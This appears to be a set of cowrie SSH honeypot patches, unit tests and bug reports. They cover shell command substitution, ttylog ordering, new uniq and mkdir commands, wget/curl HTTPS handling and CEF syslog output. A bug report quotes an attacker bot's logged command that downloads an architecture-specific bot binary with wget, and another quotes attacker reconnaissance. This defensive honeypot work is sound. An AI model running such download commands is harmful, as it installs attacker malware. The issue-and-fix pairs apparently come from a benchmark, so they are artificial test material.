diff --git a/src/cowrie/shell/honeypot.py b/src/cowrie/shell/honeypot.py --- a/src/cowrie/shell/honeypot.py +++ b/src/cowrie/shell/honeypot.py @@ -41,70 +41,19 @@ def lineReceived(self, line): self.lexer = shlex.shlex(instream=line, punctuation_chars=True, posix=True) # Add these special characters that are not in the default lexer self.lexer.wordchars += '@%{}=$:+^,()' + tokens = [] - parc_tokens = [] # stack of parcial command substitution tokens - subshell_tokens = [] # stack of subshell tokens - last_parc_token = False # control the command substitution tokens processing - last_subshell_token = False # control the subshell token processing + while True: try: - if not last_parc_token: - # if we are processing the command substitution dont read token - tok = self.lexer.get_token() - # log.msg("tok: %s" % (repr(tok))) - - if len(subshell_tokens): - if tok: - if tok.endswith(')'): - subshell_tokens.append(tok[:-1]) - last_subshell_token = True - else: - subshell_tokens.append(tok) - - if not tok or last_subshell_token: - cmds = " ".join(subshell_tokens) - self.cmdpending.append((subshell_tokens)) - last_subshell_token = False - subshell_tokens = [] - continue - - if len(parc_tokens): - if tok: - if tok.endswith(')'): - parc_tokens.append(tok[:-1]) - last_parc_token = True - else: - parc_tokens.append(tok) - - if not tok or last_parc_token: - cmds = " ".join(parc_tokens) - # instantiate new shell with redirect output - self.protocol.cmdstack.append(HoneyPotShell(self.protocol, interactive=False, redirect=True)) - # call lineReceived method that indicates that we have some commands to parse - self.protocol.cmdstack[-1].lineReceived(cmds) - # remove the shell - result = self.protocol.cmdstack.pop() - tokens.append(result.protocol.pp.redirected_data.decode()[:-1]) - last_parc_token = False - parc_tokens = [] - - continue + tok = self.lexer.get_token() + # log.msg("tok: %s" % (repr(tok))) if tok == self.lexer.eof: if tokens: self.cmdpending.append((tokens)) - tokens = [] break - """ - Why do we ignore parentheses? - We cant have this for shell command substitution to work - # Ignore parentheses - tok_len = len(tok) - tok = tok.strip('(') - tok = tok.strip(')') - if len(tok) != tok_len and tok == '': - continue - """ + # For now, treat && and || same as ;, just execute without checking return code if tok == '&&' or tok == '||': if tokens: @@ -126,24 +75,13 @@ def lineReceived(self, line): break elif tok == '$?': tok = "0" - elif tok[0] == '(': - subshell_tokens.append(tok[1:]) - if tok[-1] == ')': - last_parc_token = True - tok = None + cmd = self.do_command_substitution(tok) + tokens = cmd.split() continue - - elif tok[0] == '$': - envRex = re.compile(r'^\$\(([_a-zA-Z0-9]+)*') - envSearch = envRex.search(tok) - if envSearch is not None: - envMatch = envSearch.group(1) - parc_tokens.append(envMatch) - if tok[-1] == ')': - last_parc_token = True - tok = None - continue + elif '$(' in tok: + tok = self.do_command_substitution(tok) + elif tok.startswith('${'): envRex = re.compile(r'^\$([_a-zA-Z0-9]+)$') envSearch = envRex.search(tok) if envSearch is not None: @@ -152,6 +90,7 @@ def lineReceived(self, line): tok = self.environ[envMatch] else: continue + elif tok.startswith('$'): envRex = re.compile(r'^\${([_a-zA-Z0-9]+)}$') envSearch = envRex.search(tok) if envSearch is not None: @@ -160,6 +99,7 @@ def lineReceived(self, line): tok = self.environ[envMatch] else: continue + tokens.append(tok) except Exception as e: self.protocol.terminal.write( @@ -169,11 +109,71 @@ def lineReceived(self, line): self.cmdpending = [] self.showPrompt() return + if self.cmdpending: self.runCommand() else: self.showPrompt() + def do_command_substitution(self, start_tok): + if start_tok[0] == '(': + # start parsing the (...) expression + dollar_expr = start_tok + pos = 1 + else: + # split the first token to prefix and $(... part + dollar_pos = start_tok.index('$(') + result = start_tok[:dollar_pos] + dollar_expr = start_tok[dollar_pos:] + pos = 2 + opening_count = 1 + closing_count = 0 + + # parse the remaining tokens and execute $(...) parts when found + while opening_count > closing_count: + if dollar_expr[pos:pos + 2] == '$(': + opening_count += 1 + pos += 2 + elif dollar_expr[pos] == ')': + closing_count += 1 + if opening_count == closing_count: + + if dollar_expr[0] == '(': + # return the command in () without executing it + result = dollar_expr[1:pos] + else: + # execute the command in $() and retrieve the output + cmd = dollar_expr[2:pos] + # instantiate new shell with redirect output + self.protocol.cmdstack.append(HoneyPotShell(self.protocol, interactive=False, redirect=True)) + # call lineReceived method that indicates that we have some commands to parse + self.protocol.cmdstack[-1].lineReceived(cmd) + # remove the shell + res = self.protocol.cmdstack.pop() + result += res.protocol.pp.redirected_data.decode()[:-1] + + if pos < len(dollar_expr) - 1: + dollar_expr = dollar_expr[pos + 1:] + if '$(' in dollar_expr: + dollar_pos = dollar_expr.index('$(') + result += dollar_expr[:dollar_pos] + dollar_expr = dollar_expr[dollar_pos:] + opening_count = 1 + closing_count = 0 + pos = 1 + else: + result += dollar_expr + pos += 1 + else: + if opening_count > closing_count and pos == len(dollar_expr) - 1: + tok = self.lexer.get_token() + dollar_expr = dollar_expr + ' ' + tok + elif opening_count == closing_count: + result += dollar_expr[pos] + pos += 1 + + return result + def runCommand(self): pp = None
diff --git a/src/cowrie/test/test_echo.py b/src/cowrie/test/test_echo.py --- a/src/cowrie/test/test_echo.py +++ b/src/cowrie/test/test_echo.py @@ -158,6 +158,27 @@ def test_echo_command_018(self): self.assertEquals(self.tr.value(), b'test\n' + PROMPT) def test_echo_command_019(self): + """ + echo $(echo $(echo test)) + """ + self.proto.lineReceived(b'echo $(echo $(echo test))') + self.assertEquals(self.tr.value(), b'test\n' + PROMPT) + + def test_echo_command_020(self): + """ + echo test_$(echo test)_test + """ + self.proto.lineReceived(b'echo test_$(echo test)_test') + self.assertEquals(self.tr.value(), b'test_test_test\n' + PROMPT) + + def test_echo_command_021(self): + """ + echo test_$(echo test)_test_$(echo test)_test + """ + self.proto.lineReceived(b'echo test_$(echo test)_test_$(echo test)_test') + self.assertEquals(self.tr.value(), b'test_test_test_test_test\n' + PROMPT) + + def test_echo_command_022(self): """ (echo test) """
no $ variable expansion without surrounding whitespace **Describe the bug** From the logging: ``` 2020-09-20T01:19:40.488981Z [HTTPPageDownloader,client] Command found: wget http://[REDACTED]/bot.$(uname -m) -O- > .t 2020-09-20T01:19:40.498587Z [cowrie.commands.wget.HTTPProgressDownloader#info] Starting factory <HTTPProgressDownloader: b'http://[REDACTED]/bot.$(uname'> ``` It looks like $(uname -m) is not being parsed properly before pushing the HTTP request. Doing "echo $(uname -m) does parse correctly. **To Reproduce** Steps to reproduce the behavior: 1. Login as root 2. Wget a file using $(uname -m) 4. See error in request **Expected behavior** System variables being altered before sent to the request (it would download bot.aarch64) **Server (please complete the following information):** - OS: Linux nanopineo2 5.8.6-sunxi64 #20.08.2 SMP Fri Sep 4 08:52:31 CEST 2020 aarch64 GNU/Linux - Python: 3.7.3 **Additional context** A bot grabber tried to download a file specific for the server, but got 404 errors because the architecture $(uname -m) does not exist...
The here is more around the whitespace around the `$(uname -m)` expansion: ``` root@svr04:~# echo test$(uname)test test$(uname)test root@svr04:~# ``` vs ``` root@svr04:~# echo test $(uname) test test Linux test ``` This is a wider problem as well: ``` root@svr04:~# echo test$TERM test$TERM root@svr04:~# echo test $TERM test xterm-256color ``` I have the same issue and I'm working on a patch. It looks promising, however I still need some time for testing and fixing. Currently it breaks the `awk` command emulation. See the unit tests. ``` root@cowrie:~# echo test $(uname) test Linux root@cowrie:~# echo test$(uname) testLinux root@cowrie:~# echo test ${TERM} test xterm-256color root@cowrie:~# echo test${TERM} testxterm-256color root@cowrie:~# echo test$TERM testxterm-256color root@cowrie:~# echo test$(which ls) test/bin/ls ```
2020-10-01T21:27:39
cowrie/cowrie
1,426
cowrie__cowrie-1426
[ "1425" ]
8cadcfcc7f1db6f7959b71f7ea2c4c579d95663b
diff --git a/src/cowrie/insults/insults.py b/src/cowrie/insults/insults.py --- a/src/cowrie/insults/insults.py +++ b/src/cowrie/insults/insults.py @@ -59,15 +59,17 @@ def connectionMade(self): if self.type == 'e': self.stdinlogOpen = True + # log the command into ttylog + if self.ttylogEnabled: + (sess, cmd) = self.protocolArgs + ttylog.ttylog_write(self.ttylogFile, len(cmd), ttylog.TYPE_INTERACT, time.time(), cmd) else: self.stdinlogOpen = False insults.ServerProtocol.connectionMade(self) if self.type == 'e': - cmd = self.terminalProtocol.execcmd.encode('utf8') - if self.ttylogEnabled: - ttylog.ttylog_write(self.ttylogFile, len(cmd), ttylog.TYPE_INTERACT, time.time(), cmd) + self.terminalProtocol.execcmd.encode('utf8') def write(self, data): if self.ttylogEnabled and self.ttylogOpen:
Command output logged before command in ttylog **Describe the bug** When using ssh in 'execcmd' mode, the command output is logged before the command itself. Here a snippet from `src/cowrie/insults/insults.py` with my comments: ``` if self.type == 'e': cmd = self.terminalProtocol.execcmd.encode('utf8') <-- during this call, the output is logged if self.ttylogEnabled: ttylog.ttylog_write(self.ttylogFile, len(cmd), ttylog.TYPE_INTERACT, time.time(), cmd) <-- here the command is logged ``` **To Reproduce** Steps to reproduce the behavior: 1. Connect using ssh client and execute a command: ``` $ ssh root@cowrie "cat /proc/cpuinfo | grep name | wc -l" root@cowrie's password: 2 ``` 2. A snippet from the cowrie log ``` executing command "b'cat /proc/cpuinfo | grep name | wc -l'" CMD: cat /proc/cpuinfo | grep name | wc -l Command found: wc -l Command found: grep name Command found: cat /proc/cpuinfo exitCode: 0 sending request b'exit-status' sending close 0 remote close Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 0 seconds ``` 3. Run playlog on the new ttylog: ``` $ bin/playlog -b var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 2 cat /proc/cpuinfo | grep name | wc -l ``` **Expected behavior** The command should be logged first and the output should be logged at the time when it is available.
2020-10-06T15:11:42
cowrie/cowrie
1,428
cowrie__cowrie-1428
[ "1427" ]
8cadcfcc7f1db6f7959b71f7ea2c4c579d95663b
diff --git a/src/cowrie/commands/__init__.py b/src/cowrie/commands/__init__.py --- a/src/cowrie/commands/__init__.py +++ b/src/cowrie/commands/__init__.py @@ -40,6 +40,7 @@ 'tftp', 'ulimit', 'uname', + 'uniq', 'uptime', 'wc', 'wget', diff --git a/src/cowrie/commands/uniq.py b/src/cowrie/commands/uniq.py new file mode 100644 --- /dev/null +++ b/src/cowrie/commands/uniq.py @@ -0,0 +1,52 @@ +# Copyright (c) 2020 Peter Sufliarsky <[email protected]> +# See the COPYRIGHT file for more information + +""" +uniq command +""" + +from __future__ import absolute_import, division + +from twisted.python import log + +from cowrie.shell.command import HoneyPotCommand + + +commands = {} + + +class command_uniq(HoneyPotCommand): + + unique_lines = set() + + def start(self): + if self.input_data: + lines = self.input_data.split(b'\n') + if not lines[-1]: + lines.pop() + + self.unique_lines = set(lines) + for line in self.unique_lines: + self.writeBytes(line + b'\n') + + self.exit() + + def lineReceived(self, line): + log.msg(eventid='cowrie.command.input', + realm='uniq', + input=line, + format='INPUT (%(realm)s): %(input)s') + + self.grep_input(line) + + def handle_CTRL_D(self): + self.exit() + + def grep_input(self, line): + if line not in self.unique_lines: + self.writeBytes(line.encode() + b'\n') + self.unique_lines.add(line) + + +commands['/usr/bin/uniq'] = command_uniq +commands['uniq'] = command_uniq
diff --git a/src/cowrie/test/test_uniq.py b/src/cowrie/test/test_uniq.py new file mode 100644 --- /dev/null +++ b/src/cowrie/test/test_uniq.py @@ -0,0 +1,60 @@ +# -*- test-case-name: Cowrie Test Cases -*- + +# Copyright (c) 2020 Peter Sufliarsky +# See LICENSE for details. + +""" +Tests for uniq command +""" + +from __future__ import absolute_import, division + +import os + +from twisted.trial import unittest + +from cowrie.shell import protocol +from cowrie.test import fake_server, fake_transport + +os.environ["HONEYPOT_DATA_PATH"] = "../data" +os.environ["HONEYPOT_DOWNLOAD_PATH"] = "/tmp" +os.environ["SHELL_FILESYSTEM"] = "../share/cowrie/fs.pickle" + +PROMPT = b"root@unitTest:~# " + + +class ShellUniqCommandTests(unittest.TestCase): + + def setUp(self): + self.proto = protocol.HoneyPotInteractiveProtocol(fake_server.FakeAvatar(fake_server.FakeServer())) + self.tr = fake_transport.FakeTransport("1.1.1.1", "1111") + self.proto.makeConnection(self.tr) + self.tr.clear() + + def test_uniq_command_001(self): + """ + echo test | uniq + """ + self.proto.lineReceived(b'echo test | uniq\n') + self.assertEquals(self.tr.value(), b'test\n' + PROMPT) + + def test_uniq_command_002(self): + """ + echo -e "test\ntest\ntest" | uniq + """ + self.proto.lineReceived(b'echo -e "test\ntest\ntest" | uniq\n') + self.assertEquals(self.tr.value(), b'test\n' + PROMPT) + + def test_uniq_command_003(self): + """ + test without arguments, read stdin and quit after Ctrl+D + """ + self.proto.lineReceived(b'uniq\n') + self.proto.lineReceived(b'test\n') + self.proto.lineReceived(b'test\n') + self.proto.lineReceived(b'test\n') + self.proto.handle_CTRL_D() + self.assertEquals(self.tr.value(), b'test\n\n' + PROMPT) + + def tearDown(self): + self.proto.connectionLost("tearDown From Unit Test")
Adding command 'uniq' **Is your feature request related to a problem? Please describe.** From an attack the following command was issued: CMD: grep 'cpu cores' /proc/cpuinfo | uniq **Describe the solution you'd like** The command "uniq" does not exist yet. From the man pages: Filter adjacent matching lines from INPUT (or standard input), writing to OUTPUT (or standard output). With no options, matching lines are merged to the first occurrence. **Describe alternatives you've considered** Unsure if there is an alternative. **Additional context** No additional context
2020-10-13T19:23:18
cowrie/cowrie
1,434
cowrie__cowrie-1434
[ "1433" ]
819fbd0cc153d9c8bf886f572dd58addd66aa3b0
diff --git a/src/cowrie/commands/fs.py b/src/cowrie/commands/fs.py --- a/src/cowrie/commands/fs.py +++ b/src/cowrie/commands/fs.py @@ -517,6 +517,7 @@ def call(self): commands['/bin/mkdir'] = command_mkdir +commands['mkdir'] = command_mkdir class command_rmdir(HoneyPotCommand):
Add mkdir as command **Is your feature request related to a problem? Please describe.** I see a lot of bots trying to build the .ssh directory or a tmp directory using mkdir. However, when the command is executed they get an error back that the command does not exist. **Describe the solution you'd like** Either have it create a virtual location (that only the attacker can see), or have it reply with a txtcommand with the following text: ``` mkdir: missing operand Try 'mkdir --help' for more information. ``` **Describe alternatives you've considered** Adding the command to txtcommands, but that does not seem to work properly (missing something?). **Additional context** Add any other context or screenshots about the feature request here.
2020-10-22T02:21:33
cowrie/cowrie
1,443
cowrie__cowrie-1443
[ "1412" ]
e1aeb4f55cc081d0014c7a884efde4a626cbb368
diff --git a/src/cowrie/commands/curl.py b/src/cowrie/commands/curl.py --- a/src/cowrie/commands/curl.py +++ b/src/cowrie/commands/curl.py @@ -7,8 +7,6 @@ import os import time -from OpenSSL import SSL - from twisted.internet import reactor, ssl from twisted.python import compat, log from twisted.web import client @@ -19,77 +17,7 @@ commands = {} - -class command_curl(HoneyPotCommand): - """ - curl command - """ - limit_size = CowrieConfig().getint('honeypot', 'download_limit_size', fallback=0) - download_path = CowrieConfig().get('honeypot', 'download_path') - - def start(self): - try: - optlist, args = getopt.getopt(self.args, 'sho:O', ['help', 'manual', 'silent']) - except getopt.GetoptError as err: - # TODO: should be 'unknown' instead of 'not recognized' - self.write("curl: {}\n".format(err)) - self.write("curl: try 'curl --help' or 'curl --manual' for more information\n") - self.exit() - return - - for opt in optlist: - if opt[0] == '-h' or opt[0] == '--help': - self.curl_help() - return - elif opt[0] == '-s' or opt[0] == '--silent': - self.silent = True - - if len(args): - if args[0] is not None: - url = str(args[0]).strip() - else: - self.write("curl: try 'curl --help' or 'curl --manual' for more information\n") - self.exit() - return - - if '://' not in url: - url = 'http://' + url - urldata = compat.urllib_parse.urlparse(url) - - outfile = None - for opt in optlist: - if opt[0] == '-o': - outfile = opt[1] - if opt[0] == '-O': - outfile = urldata.path.split('/')[-1] - if outfile is None or not len(outfile.strip()) or not urldata.path.count('/'): - self.write('curl: Remote file name has no length!\n') - self.exit() - return - - if outfile: - outfile = self.fs.resolve_path(outfile, self.protocol.cwd) - path = os.path.dirname(outfile) - if not path or \ - not self.fs.exists(path) or \ - not self.fs.isdir(path): - self.write('curl: %s: Cannot open: No such file or directory\n' % outfile) - self.exit() - return - - url = url.encode('ascii') - self.url = url - - self.artifactFile = Artifact(outfile) - # HTTPDownloader will close() the file object so need to preserve the name - - self.deferred = self.download(url, outfile, self.artifactFile) - if self.deferred: - self.deferred.addCallback(self.success, outfile) - self.deferred.addErrback(self.error, url) - - def curl_help(self): - self.write("""Usage: curl [options...] <url> +CURL_HELP = """Usage: curl [options...] <url> Options: (H) means HTTP/HTTPS only, (F) means FTP only --anyauth Pick "any" authentication method (H) -a, --append Append to target file when uploading (F/SFTP) @@ -242,8 +170,78 @@ def curl_help(self): -V, --version Show version number and quit -w, --write-out FORMAT What to output after completion --xattr Store metadata in extended file attributes - -q If used as the first parameter disables .curlrc\n""") - self.exit() + -q If used as the first parameter disables .curlrc + """ + + +class command_curl(HoneyPotCommand): + """ + curl command + """ + limit_size = CowrieConfig().getint('honeypot', 'download_limit_size', fallback=0) + download_path = CowrieConfig().get('honeypot', 'download_path') + + def start(self): + try: + optlist, args = getopt.getopt(self.args, 'sho:O', ['help', 'manual', 'silent']) + except getopt.GetoptError as err: + # TODO: should be 'unknown' instead of 'not recognized' + self.write("curl: {}\n".format(err)) + self.write("curl: try 'curl --help' or 'curl --manual' for more information\n") + self.exit() + return + + for opt in optlist: + if opt[0] == '-h' or opt[0] == '--help': + self.write(CURL_HELP) + self.exit() + return + elif opt[0] == '-s' or opt[0] == '--silent': + self.silent = True + + if len(args): + if args[0] is not None: + url = str(args[0]).strip() + else: + self.write("curl: try 'curl --help' or 'curl --manual' for more information\n") + self.exit() + return + + if '://' not in url: + url = 'http://' + url + urldata = compat.urllib_parse.urlparse(url) + + outfile = None + for opt in optlist: + if opt[0] == '-o': + outfile = opt[1] + if opt[0] == '-O': + outfile = urldata.path.split('/')[-1] + if outfile is None or not len(outfile.strip()) or not urldata.path.count('/'): + self.write('curl: Remote file name has no length!\n') + self.exit() + return + + if outfile: + outfile = self.fs.resolve_path(outfile, self.protocol.cwd) + path = os.path.dirname(outfile) + if not path or \ + not self.fs.exists(path) or \ + not self.fs.isdir(path): + self.write('curl: %s: Cannot open: No such file or directory\n' % outfile) + self.exit() + return + + url = url.encode('ascii') + self.url = url + + self.artifactFile = Artifact(outfile) + # HTTPDownloader will close() the file object so need to preserve the name + + self.deferred = self.download(url, outfile, self.artifactFile) + if self.deferred: + self.deferred.addCallback(self.success, outfile) + self.deferred.addErrback(self.error, url) def download(self, url, fakeoutfile, outputfile, *args, **kwargs): try: @@ -265,11 +263,10 @@ def download(self, url, fakeoutfile, outputfile, *args, **kwargs): out_addr = (CowrieConfig().get('honeypot', 'out_addr'), 0) if scheme == 'https': - contextFactory = ssl.CertificateOptions(method=SSL.SSLv23_METHOD) - reactor.connectSSL(host, port, factory, contextFactory, bindAddress=out_addr) + context_factory = ssl.optionsForClientTLS(hostname=host) + self.connection = reactor.connectSSL(host, port, factory, context_factory, bindAddress=out_addr) else: # Can only be http - self.connection = reactor.connectTCP( - host, port, factory, bindAddress=out_addr) + self.connection = reactor.connectTCP(host, port, factory, bindAddress=out_addr) return factory.deferred @@ -320,7 +317,7 @@ class HTTPProgressDownloader(client.HTTPDownloader): lastupdate = 0 def __init__(self, curl, fakeoutfile, url, outfile, headers=None): - client.HTTPDownloader.__init__(self, url, outfile, headers=headers, agent=b'curl/7.38.0') + client.HTTPDownloader.__init__(self, url, outfile, headers=headers, agent=b'curl/7.38.0', followRedirect=False) self.status = None self.curl = curl self.fakeoutfile = fakeoutfile diff --git a/src/cowrie/commands/wget.py b/src/cowrie/commands/wget.py --- a/src/cowrie/commands/wget.py +++ b/src/cowrie/commands/wget.py @@ -7,8 +7,6 @@ import os import time -from OpenSSL import SSL - from twisted.internet import reactor, ssl from twisted.python import compat, log from twisted.web import client @@ -77,20 +75,20 @@ def start(self): self.exit() return - outfile = None + self.outfile = None self.quiet = False for opt in optlist: if opt[0] == '-O': - outfile = opt[1] + self.outfile = opt[1] if opt[0] == '-q': self.quiet = True # for some reason getopt doesn't recognize "-O -" # use try..except for the case if passed command is malformed try: - if not outfile: + if not self.outfile: if '-O' in args: - outfile = args[args.index('-O') + 1] + self.outfile = args[args.index('-O') + 1] except Exception: pass @@ -99,38 +97,32 @@ def start(self): urldata = compat.urllib_parse.urlparse(url) - url = url.encode('utf8') + self.url = url.encode('utf8') - if outfile is None: - outfile = urldata.path.split('/')[-1] - if not len(outfile.strip()) or not urldata.path.count('/'): - outfile = 'index.html' + if self.outfile is None: + self.outfile = urldata.path.split('/')[-1] + if not len(self.outfile.strip()) or not urldata.path.count('/'): + self.outfile = 'index.html' - if outfile != '-': - outfile = self.fs.resolve_path(outfile, self.protocol.cwd) - path = os.path.dirname(outfile) + if self.outfile != '-': + self.outfile = self.fs.resolve_path(self.outfile, self.protocol.cwd) + path = os.path.dirname(self.outfile) if not path or not self.fs.exists(path) or not self.fs.isdir(path): - self.errorWrite('wget: %s: Cannot open: No such file or directory\n' % outfile) + self.errorWrite('wget: %s: Cannot open: No such file or directory\n' % self.outfile) self.exit() return - self.url = url - - self.artifactFile = Artifact(outfile) - # HTTPDownloader will close() the file object so need to preserve the name - - d = self.download(url, outfile, self.artifactFile) - if d: - d.addCallback(self.success, outfile) - d.addErrback(self.error, url) + self.deferred = self.download(self.url, self.outfile) + if self.deferred: + self.deferred.addCallback(self.success) + self.deferred.addErrback(self.error, self.url) else: self.exit() - def download(self, url, fakeoutfile, outputfile, *args, **kwargs): + def download(self, url, fakeoutfile, *args, **kwargs): """ url - URL to download fakeoutfile - file in guest's fs that attacker wants content to be downloaded to - outputfile - file in host's fs that will hold content of the downloaded file """ try: parsed = compat.urllib_parse.urlparse(url) @@ -145,20 +137,25 @@ def download(self, url, fakeoutfile, outputfile, *args, **kwargs): self.errorWrite('%s: Unsupported scheme.\n' % (url,)) return None + # File in host's fs that will hold content of the downloaded file + # HTTPDownloader will close() the file object so need to preserve the name + self.artifactFile = Artifact(self.outfile) + if not self.quiet: self.errorWrite('--%s-- %s\n' % (time.strftime('%Y-%m-%d %H:%M:%S'), url.decode('utf8'))) self.errorWrite('Connecting to %s:%d... connected.\n' % (host, port)) self.errorWrite('HTTP request sent, awaiting response... ') - factory = HTTPProgressDownloader(self, fakeoutfile, url, outputfile, *args, **kwargs) + factory = HTTPProgressDownloader(self, fakeoutfile, url, self.artifactFile, *args, **kwargs) out_addr = None if CowrieConfig().has_option('honeypot', 'out_addr'): out_addr = (CowrieConfig().get('honeypot', 'out_addr'), 0) if scheme == b'https': - contextFactory = ssl.CertificateOptions(method=SSL.SSLv23_METHOD) - self.connection = reactor.connectSSL(host, port, factory, contextFactory, bindAddress=out_addr) + context_factory = ssl.optionsForClientTLS(hostname=host) + self.connection = reactor.connectSSL(host, port, factory, context_factory, bindAddress=out_addr) + elif scheme == b'http': self.connection = reactor.connectTCP(host, port, factory, bindAddress=out_addr) else: @@ -170,7 +167,7 @@ def handle_CTRL_C(self): self.errorWrite('^C\n') self.connection.transport.loseConnection() - def success(self, data, outfile): + def success(self, data): if not os.path.isfile(self.artifactFile.shasumFilename): log.msg("there's no file " + self.artifactFile.shasumFilename) self.exit() @@ -189,9 +186,9 @@ def success(self, data, outfile): shasum=self.artifactFile.shasum) # Update honeyfs to point to downloaded file or write to screen - if outfile != '-': - self.fs.update_realfile(self.fs.getfile(outfile), self.artifactFile.shasumFilename) - self.fs.chown(outfile, self.protocol.user.uid, self.protocol.user.gid) + if self.outfile != '-': + self.fs.update_realfile(self.fs.getfile(self.outfile), self.artifactFile.shasumFilename) + self.fs.chown(self.outfile, self.protocol.user.uid, self.protocol.user.gid) else: with open(self.artifactFile.shasumFilename, 'rb') as f: self.writeBytes(f.read()) @@ -199,31 +196,45 @@ def success(self, data, outfile): self.exit() def error(self, error, url): - if hasattr(error, 'getErrorMessage'): # exceptions - errorMessage = error.getErrorMessage() - self.errorWrite(errorMessage + '\n') - # Real wget also adds this: - if hasattr(error, 'webStatus') and error.webStatus and hasattr(error, 'webMessage'): # exceptions - self.errorWrite('{} ERROR {}: {}\n'.format(time.strftime('%Y-%m-%d %T'), error.webStatus.decode(), - error.webMessage.decode('utf8'))) + # we need to handle 301 redirects separately + if hasattr(error, 'webStatus') and error.webStatus.decode() == '301': + self.errorWrite('{} {}\n'.format(error.webStatus.decode(), error.webMessage.decode())) + https_url = error.getErrorMessage().replace('301 Moved Permanently to ', '') + self.errorWrite('Location {} [following]\n'.format(https_url)) + + # do the download again with the https URL + self.deferred = self.download(https_url.encode('utf8'), self.outfile) + if self.deferred: + self.deferred.addCallback(self.success) + self.deferred.addErrback(self.error, https_url) + else: + self.exit() else: - self.errorWrite('{} ERROR 404: Not Found.\n'.format(time.strftime('%Y-%m-%d %T'))) + if hasattr(error, 'getErrorMessage'): # exceptions + errorMessage = error.getErrorMessage() + self.errorWrite(errorMessage + '\n') + # Real wget also adds this: + if hasattr(error, 'webStatus') and error.webStatus and hasattr(error, 'webMessage'): # exceptions + self.errorWrite('{} ERROR {}: {}\n'.format(time.strftime('%Y-%m-%d %T'), error.webStatus.decode(), + error.webMessage.decode('utf8'))) + else: + self.errorWrite('{} ERROR 404: Not Found.\n'.format(time.strftime('%Y-%m-%d %T'))) - # prevent cowrie from crashing if the terminal have been already destroyed - try: - self.protocol.logDispatch(eventid='cowrie.session.file_download.failed', - format='Attempt to download file(s) from URL (%(url)s) failed', - url=self.url) - except Exception: - pass + # prevent cowrie from crashing if the terminal have been already destroyed + try: + self.protocol.logDispatch(eventid='cowrie.session.file_download.failed', + format='Attempt to download file(s) from URL (%(url)s) failed', + url=self.url) + except Exception: + pass - self.exit() + self.exit() # From http://code.activestate.com/recipes/525493/ class HTTPProgressDownloader(client.HTTPDownloader): def __init__(self, wget, fakeoutfile, url, outfile, headers=None): - client.HTTPDownloader.__init__(self, url, outfile, headers=headers, agent=b'Wget/1.11.4') + client.HTTPDownloader.__init__(self, url, outfile, headers=headers, agent=b'Wget/1.11.4', followRedirect=False) self.status = None self.wget = wget self.fakeoutfile = fakeoutfile
Unable to WGET from an HTTPS website **Describe the bug** When trying to use wget to fetch a file from an HTTPS source, the emulator gets stuck. In the logs I can see that the the code is failing to locate `CertificationOptions` from `twisted.internet.ssl`. That class doesn't exist as per current documentation. **To Reproduce** Steps to reproduce the behavior: 1. Run the agent (in my case through docker-cowrie) 2. Successfully connect to the honeypot via SSH 3. Run `wget https://raw.githubusercontent.com/cowrie/cowrie/master/README.rst` 4. The execution hangs indefinitely... **Expected behavior** The execution of wget should complete without issues. **Server (please complete the following information):** - OS: Debian Buster (via Docker using the docker-cowrie repo) **Additional context** The Twisted documentation has an entry for `CertificateOptions` (see [here](https://twistedmatrix.com/documents/current/api/twisted.internet.ssl.CertificateOptions.html)), so I tried manually editing the problematic lines (see [curl.py](https://github.com/cowrie/cowrie/blob/a5ff09f02dfa0f5d8a875f38e6dd536697561672/src/cowrie/commands/curl.py#L268) and [wget.py](https://github.com/cowrie/cowrie/blob/a5ff09f02dfa0f5d8a875f38e6dd536697561672/src/cowrie/commands/wget.py#L160)) and it worked. Unfortunately, I don't really have the time and means to fork the project and setup the development environment to make a PR at this time...
2020-11-06T08:46:46
cowrie/cowrie
1,463
cowrie__cowrie-1463
[ "1459" ]
f64285beb793f0ae1802d58e918311503aa3e42d
diff --git a/src/cowrie/output/localsyslog.py b/src/cowrie/output/localsyslog.py --- a/src/cowrie/output/localsyslog.py +++ b/src/cowrie/output/localsyslog.py @@ -45,6 +45,7 @@ class Output(cowrie.core.output.Output): def start(self): self.format = CowrieConfig().get('output_localsyslog', 'format') facilityString = CowrieConfig().get('output_localsyslog', 'facility') + levelString = CowrieConfig().get('output_localsyslog', 'level') self.facility = vars(syslog)['LOG_' + facilityString] self.syslog = twisted.python.syslog.SyslogObserver(prefix='cowrie', facility=self.facility) @@ -57,7 +58,7 @@ def write(self, logentry): if self.format == 'cef': self.syslog.emit({ - 'message': cowrie.core.cef.formatCef(logentry), + 'message': [cowrie.core.cef.formatCef(logentry)], 'isError': False, 'system': 'cowrie' })
CEF spaces between each character I followed the 7 steps https://cowrie.readthedocs.io/en/latest/INSTALL.html#step-1-install-dependencies I set up cef in the config file ` [output_localsyslog] enabled = true facility = USER format = cef` But the output I'm getting has a bunch of spaces it seems to have a space between each character below ` Nov 26 04:42:45 cowrie cowrie: [cowrie] C E F : 0 | C o w r i e | C o w r i e | 1 . 0 | c o w r i e . s e s s i o n . c o n n e c t | c o w r i e . s e s s i o n . c o n n e c t | 5 | a p p = S S H v 2 d e s t i n a t i o n S e r v i c e n a m e = s s h d d e v i c e E x t e r n a l I d = c o w r i e m s g = N e w c o n n e c t i o n : 1 9 2 . 1 6 8 . 2 . 5 7 : 3 3 6 2 6 ( 1 9 2 . 1 6 8 . 2 . 6 4 : 2 2 2 2 ) [ s e s s i o n : 8 a 9 0 7 9 8 c 8 9 f d ] s r c = 1 9 2 . 1 6 8 . 2 . 5 7 p r o t o = t c p s p t = 3 3 6 2 6 d p t = 2 2 2 2 d s t = 1 9 2 . 1 6 8 . 2 . 6 4 Nov 26 04:42:46 cowrie cowrie: [cowrie] C E F : 0 | C o w r i e | C o w r i e | 1 . 0 | c o w r i e . c l i e n t . v e r s i o n | c o w r i e . c l i e n t . v e r s i o n | 5 | a p p = S S H v 2 d e s t i n a t i o n S e r v i c e n a m e = s s h d d e v i c e E x t e r n a l I d = c o w r i e m s g = R e m o t e S S H v e r s i o n : b ' S S H - 2 . 0 - O p e n S S H _ 8 . 2 p 1 U b u n t u - 4 u b u n t u 0 . 1 ' s r c = 1 9 2 . 1 6 8 . 2 . 5 7 p r o t o = t c p Nov 26 04:42:46 cowrie cowrie: [cowrie] C E F : 0 | C o w r i e | C o w r i e | 1 . 0 | c o w r i e . c l i e n t . k e x | c o w r i e . c l i e n t . k e x | 5 | a p p = S S H v 2 d e s t i n a t i o n S e r v i c e n a m e = s s h d d e v i c e E x t e r n a l I d = c o w r i e m s g = S S H c l i e n t h a s 